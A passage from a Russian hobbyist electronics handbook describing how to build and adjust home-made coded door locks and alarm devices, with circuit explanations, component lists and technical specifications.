В составе счетно-решающего устройства можно выделить в качестве основных самостоятельных функциональных узлов такие, как счетчик-дешифратор, собранный на ИМС DA1; триггеры на ИМС DA2 (выводы 1, 3,4, 5 и 6), ИМС DA3 (выводы 3, 4, 5, 6), ИМС DA3 (выводы 1,2, 8, 9); инвертор; ключевой транзистор VT3; узел задержки времени срабатывания при наборе неправильного знака шифра; узел кодирования и расшифровки кода на двух переключателях S2 и S3 с переключающими группами контактов, не фиксируемые в нажатом положении. девятиразрядный узел кодирования комбинаций цифр. В качестве пояснения к описанию работы системы элементы принципиальной схемы имеют следующие дополнительные обозначения: часть микросхемы DA1 с выводами 3, 4, 5 и б является триггером DAI.1; микросхема DA3 выполняет функцию счетчика-дешифратора; часть микросхемы DA2 с выводами 1, 3—6 является вторым триггером; VT1 — ключевой транзистор; электрическая цепь, состоящая из С1, R5, R6, VD1 и части микросхемы DA1
(DA1.3), является узлом задержки времени.
Набор первоначального шифра сторожевого устройства производится на шифровальной плате, имеющей два ряда контактов, расположенных параллельно друг другу. Один ряд контактов соединен с соответствующими выходами счетчика-дешифратора, а второй ряд — друг с другом и с дешифратором.
Конструктивно этот узел устройства целесообразно разместить на лицевой плате, а в качестве контактов использовать малогабаритные приборные зажимы, рассчитанные на одно соединение, например типа КМЗ-1. Это дает возможность устанавливать любой код в любое время без перепайки контактных групп. На принципиальной схеме (рис. 3.13) контакты платы кодирования условно обозначены цифрами от 1 до 9 и имеют вид А1.1, А1.2...А1.9 и Б1, Б2...Б9. Для получения нужного кода необходимо установить перемычки между параллельно расположенными контактами отрезками монтажного провода в изоляции, имеющей высокое омическое сопротивление. Можно соединять между собой только контакты А1.1 с B1.1; A1.2 с B1.2; A1.3 с B1.3; A1.4 с B1.4; А1.5 c В1.5; В1.6 с А1.6; А1.7 с В1.7; А1.8 с B1.8; A1.9 с В1.9. При этом замкнутые между собой перемычки можно обозначить любой одной цифрой или буквой или математическим знаком.
Если замкнуты все имеющиеся 18 контактов параллельно между собой, то будет составлен, например, код, состоящий из одних и тех же цифр, букв или знаков (1, 1, 1, 1, 1, 1, 1, 1, 1 или А, А, А, А, А, А, А, А, А или +, +, +, +, +, +, +, +, +) Для упрощения схемы
шифрования рекомендуется принять за обозначения незамкнутых контактов цифру 1, а замкнутых — цифру 2. Тогда показанный на принципиальной схеме шифр будет иметь следующий вид: 1, 2, 2, 1, 2, 1, 2, 2, 2.
Для того чтобы набрать этот номер для открывания замка, в устройстве имеются две кнопки S2 и S3. Кнопка S2 при замыкании ее контактов дает команду, соответствующую замкнутым контактам шифровального поля, а конца S3 при замыкании ее контактов — незамкнутым. В этом случае целесообразно на лицевой плате у кнопки
S2 выгравировать цифру 2, а у кнопки переключателя S3 — цифру 1.
Для набора установленного шифра необходимо последовательно нажать кнопки S2 и S3 в следующем порядке:
S3, S2, S2, S3, S2, S3, S2, S2, S2. В этом случае дешифрованное девятое состояние счетчика послужит сигналом включения ИМ. Необходимо запомнить, что наличие перемычки соответствует цифре 2, а ее отсутствие — цифре 1.
При длительной эксплуатации охранного устройства могут возникнуть случаи сбоя при наборе знака, например двойное нажатие от дребезга. Чтобы этого избежать, в схему включен узел защиты, собранный на двух триггерах ИМС ДАЗ (выводы 3—6 и 1, 2, 8, 9), который срабатывает от первого замыкания любых контактов переключателей S2 и S3 и абсолютно не реагирует на остальные замыкания от дребезга.
Основным узлом устройства остается счетчик-дешифратор, собранный на ИМС DA1 и ведущий счет импульсов вводимого шифра от переключателей S2, S3. Сдвоенный триггер, выполненный на ИМС DA2, обеспечивает защиту счетчика от неправильного набора даже одного знака шифра. Если при наборе произошел сбой и была нажата не та кнопка S2 или S3, то сдвоенный триггер не позволяет дальнейший счет. Кроме этого, в сторожевом устройстве собран узел второй самозащиты при неправильном наборе знака шифра, он обеспечивает задержку времени, по истечении которой можно выполнить повторную попытку набора шифра. Время задержки определяется типом диода VD3, значениями сопротивлений резисторов R19 и R20, значением емкости конденсатора С5 и инвертором ИМС DA3. Величину задержки времени можно регулировать в широких пределах — от 2 до 20 с. Это устройство практически запрещает набирать следующий знак до истечения времени задержки. Если набор в это время все же будет выполнен, и даже правильно, результат будет отрицательным, счетчик импульсов не пропустит и ИМ ¦не сработает.
Импульс (сигнал), посланный любой кнопкой S2 или S3, переключает узел дребезга на передачу сигнала на вход датчика счетчика-дешифратора DA1. Если набор знака осуществлен правильно, то на прямом выходе триггера ИМС DA2 (вывод 1) действует низкий уровень логического нуля, разрешающий работу счетчика ИМС DA1 до полного набора шифра.
Если один из набираемых знаков шифра не совпал с установленным на шифровальной плате в .любом разряде счетчика, то на выходе триггера ИМС DA2 (выводы 1, 3—6) появляется высокий уровень логической единицы, который запрещает по существу дальнейший счет. Эта защита будет работать до тех пор, пока устройство не вернется в исходное состояние. Однако, если в это время продолжать нажимать на кнопки S2 или S3, то каждое нажатие будет увеличивать время задержки работы счетчика на величину, которая определяется времязадающей цепочкой R20, С5. После прекращения замыкания контактов переключателей S2 или S3 и по прошествии полученной задержки времени на выходе инвертора ИМС DA3 (выводы 10—13} появляется высокий уровень логической единицы, переключающий триггер ИМС DA2 (выводы 1, 3—6) и счетчик ИМС DA1 в состояние логического нуля, то есть в начальное положение.
Двойная самозащита сторожевого устройства (большое количество возможных сочетаний кодовых знаков в девятиразрядном шифре, невозможность включения ИМ при неправильном наборе и задержка времени срабатывания сторожевого устройства) при попытках подобрать шифр простым перебором знаков обеспечивает ему высокую надежность в работе и отвечает требованиям техники безопасности и охраны имущества.
Если все знаки установленного шифра набраны правильно, то на последнем выходе счетчика ИМС DA1 (вывод 11) появляется высокий уровень логической единицы, который открывает транзистор VT3, что приводит к включению оптрона DU1, а вслед за ним тиристора VS2, включающего электропитание ИМ. В качестве исполнительного устройства в данном случае рекомендуется использовать электромагнит переменного тока промышленного или самодельного изготовления.
Следует заметить, что после правильного набора всех знаков шифра дверь можно открывать только после характерного щелчка механического замка. По истечении времени задержки, определенного электрической цепочкой R.20, C5, сторожевое устройство возвратится в исходное состояние.
При изготовлении электронного сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа П416, VT2 — КТ315Б, VT3 — КТ315Г; оптрон DU1 типа АОУ103Б; выпрямительные диоды VD1 типа Д226Б, VD2 — Д226Б, VD5 — Д226Б, VD6 -VD9 типа КД202Р, VD11 — КД105Б, VD13 -VD21 - КД552A,VD22 — КД522А;
стабилитроны VD3 типа Д814Д, VD4 - Д814А, VD10 — Д814В;
конденсаторы С1 типа К73-17-630В-1 мкФ (два параллельно включенных конденсатора по 0,47 мкФ), С2 — К50-6-25В-100 мкФ, СЗ — К50-6-16В-100 мкФ, С4 — К42У-2-160В-0.1 мкФ, C5 — К50-6-25В-1.5 мкФ; резисторы R1 типа МЛТ-0,25-100 Ом, R2 — МЛТ-0,25-27 кОм, R3 — СПЗ-4Ма-0,25Вт-47 кОм, R4 — МЛТ-0,25-62 кОм, R5 — МЛТ-2-330 кОм, R6 — С5-35В-10Вт-10 Ом (ПЭВ-10Вт), R7 — МЛТ-2-20 кОм, R8 — МЛТ-2-20 кОм, R9 — МЛТ-0,5-2,4 кОм, R10 — МЛТ-0,25-2,2 кОм, R11 — МЛТ-0,25-470 Ом, R12 — МЛТ-0,125-470 Ом, R13 — МЛТ-0,125-100 кОм, R14 — МЛТ-0,25-10 кОм, R15 — МЛТ-0,25-27 кОм, R16 — МЛТ-0,25-1 кОм, R17 — МЛТ-0,25-27 кОм, R18—МЛТ-0,5-82 кОм, R19 — МЛТ-0,125-27 кОм, R20 — МЛТ-0,125-4,7 кОм; электрические соединители X1 типа «вилка», А1.1—А1.9 и В1—В9 типа КМЗ-1 (разъемные зажимные контакты на одно соединение любого типа); предохранители F1, F2 типа ПМ1-0,25А, F3, F4 — ПМ1-0.15 А плавкие; ИМС DA1 типа К176ИЕ8, DA2 — К176ТМ2, D3 — К176ЛА7; тиристоры VS1 типа КУ202К, VS2— КУ202Н; индикаторная лампа H1 типа ТН-02-2; светодиод VD12 типа АЛ307А; электрические соединители X1 типа «вилка», А1, В1 — КМЗ-1 приборные однополюсные; переключатели S1 типа П2К или П1Т-1-1, S2, S3 — КМ1-1.
При изготовлении сторожевого устройства можно применить другие ЭРИ и ЭРЭ, предварительно проверенные на соответствие требованиям ТУ и КД. Резисторы типа МЛТ можно заменить на резисторы типов ОМЛТ, МТ, С1-4, УЛИ, БЛП, С2-8, ВСа; конденсаторы типа К73-17 — на К10У-5, К73-15, К78-2, конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20, можно применить конденсаторы типов К53-4А, К42У-2, МБМ, МБГ; электромагнит постоянного тока Y1 типа ЭМ2-220-1 можно заменить на самодельный электромагнит, переделанный с промышленного типа МИС1100Е; транзистор типа П416 — на ГТ308Б, транзистор типа КТ315Б — на КТ312А, КТ312Б;
выпрямительные диоды типа Д226Б — на любые кремниеные диоды с допустимым обратным напряжением, не менее 100...500 В и прямым током не менее 200 мА; ИМС типа К176ИЕ8 можно заменить двумя ИМС типов К176ИЕ2 и К176ИД1.
Сторожевое устройство собрано в прямоугольном пластмассовом корпусе. Все элементы устройства размещены на печатной плате, изготовленной из одностороннего фольгированного стеклотекстолита толщиной не менее 1,5 мм. Проводники печатной платы могут быть выполнены либо традиционным методом травления, либо их вырезают специальным резаком. Габаритные размеры корпуса устройства не превышают 120Х95Х45 мм. На боковых поверхностях и крышке корпуса размещаются элементы управления, кнопки дешифратора, индикаторные лампы и шифровальное поле в виде двух планок с КМЗ-1.
На крышке и днище корпуса необходимо предусмотреть вентиляционные отверстия, которые располагаются над тепловыделяющими элементами. После изготовления корпус сторожевого устройства необходимо покрыть нитрокраской, цвет которой должен соответствовать интерьеру помещения, так как устройство устанавливается, как правило, рядом с входной дверью.
Монтаж, сборка и особенно подключение и регулировка сторожевого устройства должны осуществляться при обязательном соблюдении правил электробезопасности, так как большинство электрических цепей устройства находятся под высоким напряжением переменного тока питающей сети 220 В, которое опасно для жизни. Это обстоятельство необходимо учитывать при установке сторожевого устройства на место и при ремонте. В схеме отсутствует сетевой понижающий трансформатор питания, а гальваническая развязка осуществляется только оптроном DU1 по низковольтным цепям.
В дополнение к сказанному об установке термодатчика следует заметить, что выбор места его крепления зависит не только от формы охраняемого объекта, но и от конструкции приспособления, к которому крепится транзистор VT1. Можно установить термодатчик в герметичной полиэтиленовой упаковке, что позволит произвести регулировку порога срабатывания охранного устройства, погружая его в горячую воду определенной температуры.
Важным конструктивным элементом системы является ИМ и в данном частном случае стопорное устройство механического замка. Эта система должна позволять хозяину дома открывать охраняемое помещение в случае, когда стопор освобождает механизм замка под воздействием счетно-решающего устройства, в случае, когда есть и когда нет электропитания от сети переменного тока. Такие конструкции не являются новинкой, широко известны и применяются в разных вариантах в изделиях домашних мастеров.
При монтаже комплектующих элементов, и особенно ИМС, ППП, транзисторов, необходимо строго соблюдать правила сборки, технологические приемы и операции, которые обеспечат надежные контактные соединения с минимальными переходными сопротивлениями и качественную эксплуатацию электронного сторожевого устройства. Пайку всех элементов следует осуществлять припоем марки ПОС-40 или ПОС-60 только низковольтным паяльником мощностью не более 25 В при ограниченном времени нагрева контактов, которое не должно превышать 2 с. И обязательно при пайке каждого вывода ППП или ИМС в качестве теплоотвода надо использовать металлический пинцет.
Весь наружный монтаж электрических соединителей производите кабелем, а не монтажным проводом. Кабель должен иметь двойную изоляцию, а ее сопротивление постоянному току должно быть не менее 200 МОм. Печатную плату и мощные транзисторы рекомендуется установить на дюралюминиевом шасси.
Можно в качестве шифра в сторожевом устройстве принять обычно используемый во всех кодовых замках цифровой код от 1 до 9. Тогда несколько усложняется процесс расшифровки, так как изменить номера переключателей S2 и S3 на новые не представляется возможным из-за того, что они не отвечают на вопрос «да — нет».
Регулировка и настройка сторожевого устройства не требует сложных ИП. В данном случае достаточно иметь простой авометр с автономным питанием. Налаживание устройства состоит в подборе сопротивления резисторов и измерении действующих напряжений в контрольных точках и на выходе выпрямительного устройства. Необходимо следить за правильностью установки постоянного напряжения 9 В.
Защитное устройство требует подбора сопротивления резистора R4, и, как было указано ранее, необходимо задать температурные пределы срабатывания защиты. Устройство должно срабатывать при среднем положении движка резистора R3, так как при заданной температуре должен перегорать предохранитель F2.
Порядок данной регулировки следующий.
1. Сначала термодатчик (транзистор VT1) герметически запаивают в полиэтиленовую пленку так, чтобы можно было погружать его в горячую воду, имеющую определенную температуру.
2. Затем обычным термометром измеряют температуру окружающего воздуха в охраняемом помещении.
3. Плавкий предохранитель F2 заменяют лампой накаливания мощностью 150 Вт, рассчитанной на подключение к промышленной сети.
4. Термодатчик помещают в горячую воду с температурой на 5... 15 °С выше той, при которой должна сработать защита, например с температурой 85 °С.
5. Резисторами R3 и R4 через 10 мин после нагревания термодатчика устанавливают порог срабатывания защитного устройства, который определяется моментом загорания лампы накаливания 150 Вт.
6. После этого лампа отключается и вместо нее вновь ставится предохранитель F2.
На следующем этапе регулировки подбираются сопротивления резисторов, включенных в цепь дешифратора R16—R18 (27, 27 и 82 кОм). Сопротивления этих резисторов можно менять в широких пределах.. Если кнопки управления дешифратором S2 и S3 расположены на значительном расстоянии от электронного блока, то рекомендуется монтажные соединения выполнять экранированным проводом.
Основные электрические параметры и технические характеристики универсального электронного сторожевого устройства системы «Сириус»
Номинальное напряжение питающей сети
переменного тока, В..................... 220
Номинальная частота питающей сети
переменного тока, Гц.................... 50
Пределы изменения напряжения питающей сети,
при которых сохраняется работоспособность
устройства, В......................... 180... 235
Пределы изменения частоты питающей сети
переменного тока, Гц................... 49, 5... 50, 5
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более............. 12
Номинальное напряжение питания автономного
источника постоянного тока, В............. 9
Пределы изменения напряжения постоянного тока
автономного источника, В................ 8... 12
Коэффициент стабилизации выпрямленного
напряжения постоянного тока, не менее...... 80
Амплитуда пульсации выпрямленного напряжения
постоянного тока, мВ, не более............ 8
Пределы изменения температуры окружающей среды,
при которых срабатывает
защитное устройство, °С................. 50... 125
Количество охраняемых объектов при использовании
шифр-замка, шт...................... 1
Количество объектов, охраняемых температурными
датчиками, шт....................... 1... 15
Количество элементов типа 373, входящих
в автономный источник электропитания, шт.... 6
Вероятность подбора шифра сторожевого устройства
при незнании кода, не более.............. 0, 1^-4
Количество возможных комбинаций
при установлении шифра, шт .............. Зх105
Количество разрядов кодовой комбинации, шт . . . . 9
Вероятность безотказной работы устройства
при риске заказчика в=0,95, не менее ....... 0,98
Срок службы, ч, не менее ................. 5000
Включение датчиков температуры ............ параллельное
Сопротивление шлейфа, кОм, не более ......... 5
Задержка времени срабатывания счетчика
после неправильного набора очередного
шифра, с ........................... 1...20
Ток, потребляемый устройством в режиме
холостого хода, мА, не более .............. 6
Мощность, потребляемая устройством при работе
счетчика и при срабатывании ИМ, Вт,
не более ........................... 50
Мощность электромагнита, Вт, не более ........ 30
Сопротивление изоляции токоведущих частей
устройства, МОм, не менее ............... 10
Помехозащищенность устройства при воздействии
внешнего электромагнитного поля, дБ,
не менее ........................... 100
Условия эксплуатации:
температура окружающей среды, °С ....... —20...+40
относительная влажность воздуха при температуре 22 °С, %, не более ................... 90±3
атмосферное давление воздуха, мм рт. ст. ..... 200...900
Рис. 3.13. Принципиальная схема универсального электронного сторожевого устройства системы «Сириус».
3.8. РЕЛЕЙНОЕ СТОРОЖЕВОЕ УСТРОЙСТВО С ПЯТИЗНАЧНЫМ ШИФРОМ
Электромеханическое сторожевое устройство относится к числу наиболее простых релейных полуавтоматов, изготовление которых в условиях радиолюбительской лаборатории не представляет больших затруднений. При этом домашний мастер при изготовлении данного устройства может много экспериментировать, совершенствовать не только электрическую схему, но и конструктивное исполнение, вносить в нее необходимые изменения и дополнения. Сама принципиальная электрическая схема является примером классического исполнения таких устройств, она дает возможность радиолюбителю проверить большинство технологических приемов сборки и монтажа и выполнить регулировку и настройку самыми простыми ИП и инструментами.
Такие релейные устройства устанавливаются на входных дверях городских домов и подъездов, выполняются в различных вариантах конструктивных и электротехнических решений. Настоящее сторожевое устройство характеризуется достаточно высокими эксплуатационными характеристиками, надежностью, долговечностью и простотой электрического монтажа. Разработано сторожевое устройство для работы в жестких условиях механических и климатических нагрузок в УХЛ, ХЛ, В как внутри охраняемых помещений, так и на открытых площадках. Устройство устойчиво работает при температуре окружающей среды от —30 до 45 °С, при повышенной относительной влажности воздуха до 92% при температуре 25 °С и при пониженном атмосферном давлении до 5 мм рт. ст.
Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50 Гц или от автономного источника питания постоянного тока напряжением 24 В, который подключается к разъемным зажимным контактам А и Б.
Принципиальная электрическая схема релейного сторожевого устройства приведена на рис. 3. 14. Она включает в свой состав входные цепи с сигнальными устройствами, сетевой понижающий трансформатор питания Т1, выпрямительное устройство, работающее на емкостный фильтр, и собственно релейный автомат.
Подключается устройство к сети питания с помощью электрического соединителя X1 типа «вилка» и
Рис. 3. 14. Принципиальная схема релейного сторожевого устройства с пятизначным шифром.
стандартной штепсельной розетки. Плавкие предохранители F1 и F2, установленные на входе электрической цепи, предназначены для защиты устройства от коротких замыканий и перегрузок, которые очень часто возникают из-за неправильного монтажа, ошибок, допускаемых начинающими радиолюбителями, а также из-за неисправных комплектующих ЭРЭ. Включение и выключение электропитания устройства производится однополюсным переключателем S1, который должен быть установлен на лицевой панели корпуса сторожевого устройства, и, как правило, рядом с индикаторной лампой тлеющего разряда H1. Здесь же, на лицевой панели корпуса устройства, устанавливаются держатели предохранителей F1 и F2.
К контактным соединителям Х2 и ХЗ подключается электрический звонок BA1, работающий от сети переменного тока напряжением 220 В и включаемый в действие контактами К5. 2 электромагнитного реле К5.
Сетевой понижающий трансформатор питания Т1 унифицированной конструкции позволяет обеспечить необходимую электробезопасность при эксплуатации, регулировке и ремонте сторожевого устройства, так как на выходе трансформатора действуют низкое переменное напряжение и небольшие токи нагрузки, не опасные для жизни человека. Сетевой трансформатор питания обесчивает также заданное выходное напряжение постоянного тока на выпрямителе и полную гальваническую развязку вторичных цепей релейного автомата и цепей управления от высокого напряжения питающей сети переменного тока.
Выпрямительное устройство собрано по однофазной двухполупериодной мостовой схеме на четырех выпрями тельных диодах малой мощности VD1,VD4 и оксидном конденсаторе С1, который выполняет роль емкостного фильтра, сглаживающего пульсации выпрямленного напряжения постоянного тока и обеспечивающего минимальную пульсацию. Выпрямитель мостового типа характеризуется пониженным значением обратного напряжения на выпрямительных диодах, высоким коэффициентом использования габаритной мощности сетевого трансформатора питания Т1, повышенным уровнем пульсации на выходе выпрямителя по сравнению с другими видами схем выпрямителей малой мощности. Одновременно выпрямитель на четырех диодах имеет некоторые недостатки, например, повышенные потери мощности, пониженный кпд, повышенную стоимость изготовления, невозможность установки диодов на радиаторе охлаждения без изоляционных прокладок, сложную технологию изготовления.
Релейный автомат имеет очень простую схему соединений, включения и работы комплектующих ЭРИ и ЭРЭ, но отличается высокой степенью надежности и долговечности при эксплуатации, а его сборка под силу начинающему радиолюбителю и юным техникам.
При изготовлении сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: сетевой понижающим трансформатор питания Т1 типа ТН34-127/220-50; электромагнитные реле К1—К5 типа РЭС-9 (например, паспорт РС4.529.029-03); выпрямительные диоды VD1—VD4 типа Д237А; конденсатор С1 типа К50-6-50В-100 мкФ; резистор R1 типа МЛТ-2-470 кОм; индикаторная лампа H1 типа ТН-03; звонок электрический бытовой BA1 с напряжением питания 220 В любой конструкции и типа; предохранители плавкие F1, F2 типа ИМ 1-0, 5 А; переключатели S1 типа П1Т-1 1, S2 — П2К; электрические соединители X1 типа, «вилка» Х2—Х19 —"штырь". и «гнездо» приборные покупные или самодельной конструкции, S3—S11 — КМ1-1; A,Б ,В1 и В2— разъемные соединения самодельной конструкции.
Исполнительным механизмом сторожевого устройства является электромагнит промышленного изготовления или втяжной соленоид типа КМ1, которые устанавливаются непосредственно на входной двери и соединяются специальной тягой с защелкой механического замка. В устройстве может быть применен самодельный соленоид, работающий от сети переменною тока и включаеый параллельно звонку ВА1 вместе с последовательно соединенными контактами реле К4.2. Конструкция такою соленоида состоит из сердечника, катушки с обмоточным проводом, корпуса и деталей соединения соленоида с замком. Сердечник соленоида изготавливается из электротехнической стали или мягкого железа, имеет диаметр основного стержня 29 мм и длину до 100 мм. Если сердечник соленоида изготавливается не круглого, а прямоугольного сечения, то и катушка соленоида должна иметь прямоугольное отверстие с размерами 20Х20 мм. На конце сердечника нарезана резьба М12 длиной 18...20 мм. Катушка соленоида состоит из каркаса длиной 80...85 мм и обмоточного провода марки ПЭВ-2 диаметром 0,31 мм. Внутренние размеры катушки, куда входит сердечник, равны диаметру 20,5 мм или квадрату с размерами 20,5Х20,5 мм. После намотки наружный диаметр катушки составит ориентировочно 30 мм при толщине стенок каркаса до 1,5 мм. Число витков, рассчитанных на напряжение 220 В, равно 5400, и на каждый виток действует напряжение 0,04 В.
Соленоид вместе с пружинным механическим замком устанавливается на дверь, закрепляется винтами по разметке после проверки хода ригеля и надежного запирания двери. Для соединения соленоида с пружинным механизмом производится соответствующая доработка замка. Для увеличения тяговой силы соленоида необходимо с другого конца отверстия катушки закрепить дополнительный сердечник из электротехнической стали длиной 15...20 мм.
Электрический переключатель S2 является блокировочным и устанавливается также на входной двери. Его
контакты размыкаются при открывании двери и вновь замыкаются при закрывании. Это соответствует тому, что при открывании дверей все обмотки реле К1—К4 обесточиваются и их контакты возвращаются в исходное положение, подготавливая релейный автомат к следующему набору шифра и приходу нового посетителя, знающего этот шифр.
Соединение контактов блокировочного переключателя и подключение соленоида к источникам электропитания производятся высокопрочным кабелем с двойной изоляцией, который прокладывается по косяку двери и стене к пульту управления и кнопкам дешифратора.
Работает релейное сторожевое устройство следующим образом. После включения сторожевого устройства в сеть переменного тока или к постоянному источнику питания и замыкания контактов переключателя S1 напряжение сразу же подается на сетевой трансформатор питания Т1 и выпрямительное устройство, подготавливая его к эксплуатации, если перед этим был установлен соответствующий шифр. Как следует из приведенной на рис.3.13 принципиальной схемы, кодирующие вставки соединителей замыкают контакты А2—Х4, A3—Х6, А4—Х8, А7— X14, таким образом набирается шифр из пяти цифр 2, 3, 4, 6 и 7. В оставшиеся гнезда вставлены вилки Х2, Х10, Х16, Х18, соединенные с обмоткой реле К5.
Дешифровка кода и открывание двери могут производиться только в строго указанной последовательности:
сначала необходимо нажать кнопку переключателя S4, соответствующую первой цифре шифра 2, затем S5, S6, S8 и S9. Любое нажатие кнопок в другой последовательности к положительному результату не приводит, а если будут нажаты кнопки не из установленного шифра, то всегда произойдет общий сброс и устройство возвратится в исходное состояние. Например, если после правильного набора нескольких первых цифр, при которых срабатывают последовательно реле K1, К2, КЗ, будет нажата кнопка переключателя S3, то питание будет подано на электромагнитное реле К5, которое сработает и своими контактами K5.1 разомкнет питание реле К1, и произойдет общий сброс всех правильно набранных первых цифр шифра.
При правильном наборе шифра, когда нет ошибок, происходят следующие переключения. После нажатия на кнопку переключателя S4, соответствующую цифре 2 сработает реле К1, подготавливая устройство защиты к набору второй цифры шифра, так как будут замкнуты контакты К1.1, блокирующие электропитание реле К1, и одновременно будут замкнуты контакты К1.2, подготавливающие подачу питания на реле К2 и т.д. После нажатия на кнопку S5, соответствующую второй цифре шифра 3, питание с выпрямителя будет подано на обмотку реле К2 через цепочку S5, Х7, Х6, A3, К1.2 на К2. После срабатывания К2 контакты К2.2 подготавливают эту цепочку к подаче напряжения на реле КЗ и набору следующей цифры шифра. Контакты К2.1 самоблокируют подачу питания на реле К2. После нажатия на кнопку переключателя S6, соответствующую третьей цифре правильного кода, питание подается на обмотку реле КЗ, оно срабатывает, замыкая свои контакты КЗ.1 и КЗ.2. При этом замкнутые контакты К.3.1 самоблокируют питание реле КЗ, а контакты КЗ.2 подготавливают устройство к подаче напряжения питания на обмотку реле К4.
Теперь, правильно набирая предпоследнюю цифру шифра 6, необходимо нажать на кнопку переключателя S8 и подать напряжение питания на реле К4 по электрической цепи S8, Х13, Х12, А6, КЗ.2, обмотка реле К4, K5.1, S2. Реле К4, срабатывая, замыкает свои контакты К4.1 и К4.2. Контакты К4.1 самоблокируют питание реле после отпускания кнопки переключателя S8. Контакты К4.2 замыкают цепь питания электромагнита КМ1 или соленоида, подготавливая его к срабатыванию. После нажатия на кнопку переключателя S9 электропитание подается на электромагнит КМ1, который, срабатывая, открывает замок на входной двери.
Необходимо отметить, что при нажатии на любые кнопки переключателей S3, S7, S10 и S11 напряжение электропитания подается на обмотку реле К5, которое замыкает контакты К5.2 и размыкает контакты K5.1. При замыкании контактов электропитание сети переменного тока подается на электрический звонок, который будет работать в течение времени нажатия на указанные замыкающие кнопки. В некоторых случаях, для большей скрытности кодирования, цепь звонка исключают из схемы. Контакты К5.1 в разомкнутом состоянии обесточивают питание всех обмоток реле К1—К4, которые не позволяют сработать всей системе.
При правильной сборке и монтаже из заведомо исправных ЭРЭ релейное устройство в настройке не нуждается. Оно начинает работать сразу же после включения в сеть.
Вместо покупного унифицированного трансформатора питания в устройстве можно применить самодельный трансформатор, не уступающий по своим техническим характеристикам трансформатору типа ТН, но при условии правильного выполнения всех операций изготовления и соблюдения передовой технологии. Большинство основных технологических приемов не требуют значительной подготовительной работы. Основные из этих приемов изложены в предыдущих главах справочника, отступления от которых приводят к нежелательным последствиям. Моточные данные сетевого понижающего трансформатора питания Т1 самодельной конструкции с уменьшенным числом обмоток приведены в табл. 3.13.
Таблица 3.13. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в релейном сторожевом устройстве с пятизначным шифром
Основные электрические параметры
и технические характеристики
релейного сторожевого устройства с пятизначным шифром
Номинальное напряжение питающей сети
переменного тока, В .................... 220
Номинальная частота питающей сети
переменного тока, Гц .................... 50
Коэффициент нелинейных искажении питающей сети переменного тока, %, не более.............. 10
Номинальное напряжение питающего автономного
источника постоянного тока, В.............. 24
Пределы изменения напряжения питающей сети переменного тока, В..................... 187... 245
Пределы изменения частоты питающей сети
переменного тока, Гц.................... 49... 51
Пределы изменения напряжения постоянного тока
автономного источника питания, В........... 20... 25
Напряжения на выводах обмоток сетевого унифицированного трансформатора питания. В:
1 и 2; 4 и 5 ......................... 110
7 и 8; 9 и 10 ........................ 6,3
11 и 12; 11 и 15 ......................5
11 и 13; 14 и 16 ..................... .6,3
Напряжение питания реле постоянного тока, В .... 24
Время готовности сторожевого устройства после включения напряжения питания, с, не более ..... 0,2
Время срабатывания устройства после набора одной цифры шифра, с, не более ............ 0,1
Количество одновременно охраняемых объектов, шт . 1 Максимальное количество цифр шифра, шт ..... .9
Количество вариантов набора шифра, шт ........ 362 880
Сопротивление изоляции токоведущих проводников и частей устройства относительно металлического корпуса и между собой, МОм, не менее ........ 20
Помехозащищенность релейного автомата при воздействии внешнего электромагнитного поля;
дБ, не менее .......................... 100
Срок службы, ч, не менее .................. 4000
Вероятность безотказной работы устройства при риске заказчика в = 0,9, не менее ........ 0,98
кпд, %,не менее ........................ 82
Условия эксплуатации:
температура окружающей среды, °С ........ —25...+45
относительная влажность воздуха при температуре 22 °С, %, не более ................... 95±3
пониженное атмосферное давление воздуха, кПа (мм рт. ст.) ......................... 53,3 (400)
3.9. СТОРОЖЕВОЕ УСТРОЙСТВО НА ДВУХ МИКРОСХЕМАХ
Электронное сторожевое устройство, предлагаемое к изготовлению в домашней мастерской, представляет собой полууниверсальную простую систему со световой сигнализацией, которая может быть установлена в городских квартирах, офисах, производственных помещениях, на садово-огородных участках и т. д. Устройство рассчитано на эксплуатацию в самых жестких климатических условиях при
воздействии механических нагрузок. Устройство достаточно устойчиво работает при температуре от -40 до 40 °С и при относительной влажности воздуха до 90+_3% при температуре 20 °С, а также при пониженном атмосферном давлении воздуха до 5 мм рт. ст. Работает сторожевое устройство от сети переменного тока напряжением 127 или 220 В частотой 50 Гц и преобразователя напряжения плюс 15 — ноль — минус 15 В.
Автоматическое устройство может применяться для охраны средств подвижного транспорта и может работать от бортовой электросети постоянного тока напряжением до 12 В. Сигнальные цепи, развернутые по периметру охраняемых объектов или территорий, обеспечивают мгновенное срабатывание системы при размыкании контактов конечных выключателей, но сигнал тревоги подается с задержкой.
Сторожевое устройство, собранное на двух ИМС, характеризуется малым потреблением электроэнергии как в рабочем, так и в холостом режимах эксплуатации. Оно обеспечивает временную задержку срабатывания системы световой сигнализации после несанкционированного вторжения на охраняемый объект, что дает возможность владельцу сторожевого устройства установить систему в исходное состояние до того, как оно будет приведено в действие и подаст сигнал тревоги. После срабатывания электронной схемы управления сигналы тревоги раздаются тоже не сразу, а через определенный промежуток времени: после того как сигнальная цепь будет разомкнута. Время подачи звукового сигнала или сирены ограничено работой специального таймера. Также устройство характеризуется автоматическим возвратом в начальное состояние после подачи сигналов тревоги и возвращением в ждущий режим эксплуатации с помощью ручного управления; возможностью установки сигнальных устройств тревоги и оповещения у соседей по квартире и по месту охраняемого объекта; скрытностью установки источника сигнализации и кнопок управления; максимальной защищенностью от ложных срабатываний.
Сигнальная цепь может быть выполнена в различных конструктивных исполнениях, которые определяются материально-техническими возможностями домашнего мастера и оснащением его радиолюбительской лаборатории. Сигнальная цепь может иметь практически неограниченную протяженность по периметру охраняемого объекта, но ее общее сопротивление не должно превышать 10 кОм. В качестве наиболее простых элементов сигнализации могут быть применены герконы, микропереключатели, контактные соединители, разрывные цепи.
Вся сигнальная цепь в ждущем режиме работы должна быть замкнута, и по ней должен протекать незначительный электрический ток, определенный данным схемным значением. И пока по этой цепи течет электрический ток, сигнальная система на внешние электромагнитные поля и другие излучатели энергии не реагирует. Необходимо отметить, что даже мощный сигнал тревоги после срабатывания устройства не создает больших неудобств соседям, так как действует (работает) определенное и заранее заданное время, после чего автоматически отключается и приходит в исходное состояние.
